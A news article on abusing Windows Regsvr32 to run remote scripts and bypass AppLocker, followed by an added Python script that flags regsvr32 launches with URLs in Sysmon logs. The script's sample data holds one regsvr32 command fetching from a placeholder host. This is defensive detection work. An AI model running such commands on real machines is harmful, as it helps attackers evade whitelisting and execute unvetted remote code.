A core Windows command-line utility, Regsvr32, used to register DLLs in the Windows Registry, can be abused to run remote code from the Internet, bypassing application whitelisting protections such as Microsoft’s AppLocker.
A researcher who requested anonymity found and privately disclosed the issue to Microsoft on Tuesday. It’s unknown whether Microsoft will address it with a security bulletin or in a future release.
The researcher said the issue was discovered while researching AppLocker bypasses.
“There’s really no patch for this; it’s not an exploit. It’s just using the tool in an unorthodox manner. It’s a bypass, an evasion tactic,” the researcher said.
Complicating matters is that Regsvr32 normally requires admin privileges to run in order to be able to register COM (component object model) objects and DLLs on the operating system.
“Only admins normally run this. In this case, I can run it as a normal user,” the researcher said. “I could call unregistered methods and execute them as a normal user.”
Documentation on Regsvr32 does not indicate that it would accept scripts from the Internet. Recent so-called fileless malware attacks have used Windows PowerShell to download malware from the Internet, and it appears this issue could be abused in a similar way.
The researcher said that attacks using this method would be tough to detect.
“There are not many artifacts left on the box to indicate it ran,” the researcher said, adding that a command-line auditing tool such as Sysmon would log that someone ran Regsvr32 with a URL in the parameter. “Because the file is downloaded from a URL, there would be a minimal footprint. I’m not sure there would be much left on the system to indicate it ran.”
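The detection angle the researcher points to, Regsvr32 launched with a URL in its arguments, is straightforward to turn into a rule once process creation is audited with command lines. The following is an added example, not code from the article or from the researcher: it parses constructed Sysmon Event ID 1 (process creation) records, flattened to the `Key: Value` lines of the event message, and flags any regsvr32.exe launch whose command line carries an `http://` or `https://` URL. The field names (`Image`, `CommandLine`, `User`, `IntegrityLevel`, `ParentImage`) are Sysmon's; the events themselves, the `CORP\alice` account and the `example.invalid` host are made up for the sample. The integrity level is reported alongside the hit because, as the article notes, Regsvr32 normally runs as an administrator, so a medium-integrity launch fetching a URL is the case worth escalating.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Constructed Sysmon Event ID 1 records (sample data, not real captures).
# Event 1: regsvr32 run by a normal user with a URL in its arguments (the case to flag).
# Event 2: regsvr32 registering a local DLL from an installer (benign, must not fire).
# Event 3: a URL on the command line of a different binary (must not fire).
SAMPLE_EVENTS = [
    """Process Create:
Image: C:\\Windows\\System32\\regsvr32.exe
CommandLine: regsvr32.exe /s /i:http://example.invalid/placeholder
User: CORP\\alice
IntegrityLevel: Medium
ParentImage: C:\\Windows\\System32\\cmd.exe""",
    """Process Create:
Image: C:\\Windows\\System32\\regsvr32.exe
CommandLine: regsvr32.exe /s "C:\\Program Files\\Vendor\\vendor.dll"
User: NT AUTHORITY\\SYSTEM
IntegrityLevel: System
ParentImage: C:\\Windows\\System32\\msiexec.exe""",
    """Process Create:
Image: C:\\Windows\\System32\\notepad.exe
CommandLine: notepad.exe https://example.invalid/notes.txt
User: CORP\\alice
IntegrityLevel: Medium
ParentImage: C:\\Windows\\explorer.exe""",
]

# A URL anywhere in the argument string; quotes and whitespace end the match.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# regsvr32 named in the command line, with or without the .exe suffix.
REGSVR32_RE = re.compile(r"\bregsvr32(\.exe)?\b", re.IGNORECASE)


@dataclass
class Finding:
    user: str
    integrity: str
    url: str
    parent: str
    command_line: str


def parse_event(text: str) -> Dict[str, str]:
    """Turn the 'Key: Value' lines of a Sysmon event message into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines():
        if ": " in line:
            key, value = line.split(": ", 1)
            fields[key.strip()] = value.strip()
    return fields


def check_event(fields: Dict[str, str]) -> Optional[Finding]:
    """Return a Finding when regsvr32 was launched with a URL in its arguments."""
    command_line = fields.get("CommandLine")
    if command_line is None:
        # Without command-line auditing the URL never reaches the log, so there
        # is nothing to inspect; the event is not silently treated as benign.
        return None
    image_name = ntpath.basename(fields.get("Image", "")).lower()
    if image_name != "regsvr32.exe" and not REGSVR32_RE.search(command_line):
        return None
    match = URL_RE.search(command_line)
    if match is None:
        return None  # local DLL registration: normal use of the tool
    return Finding(
        user=fields.get("User", "?"),
        integrity=fields.get("IntegrityLevel", "?"),
        url=match.group(0),
        parent=fields.get("ParentImage", "?"),
        command_line=command_line,
    )


def scan(events: Iterable[str]) -> List[Finding]:
    """Run the check over a batch of raw event messages."""
    return [f for f in (check_event(parse_event(e)) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"regsvr32 fetched {finding.url} as {finding.user} "
              f"(integrity {finding.integrity}, parent {finding.parent})")
```

The rule keys on the URL rather than on any particular switch, so it survives argument reordering, and it deliberately ignores regsvr32 runs that reference only local paths, which are routine during software installation. Because the evidence lives entirely in the command line, the check is only as good as the audit source: Sysmon's process-creation event (or Windows 4688 with command-line logging enabled) must be collected before the download ever happens.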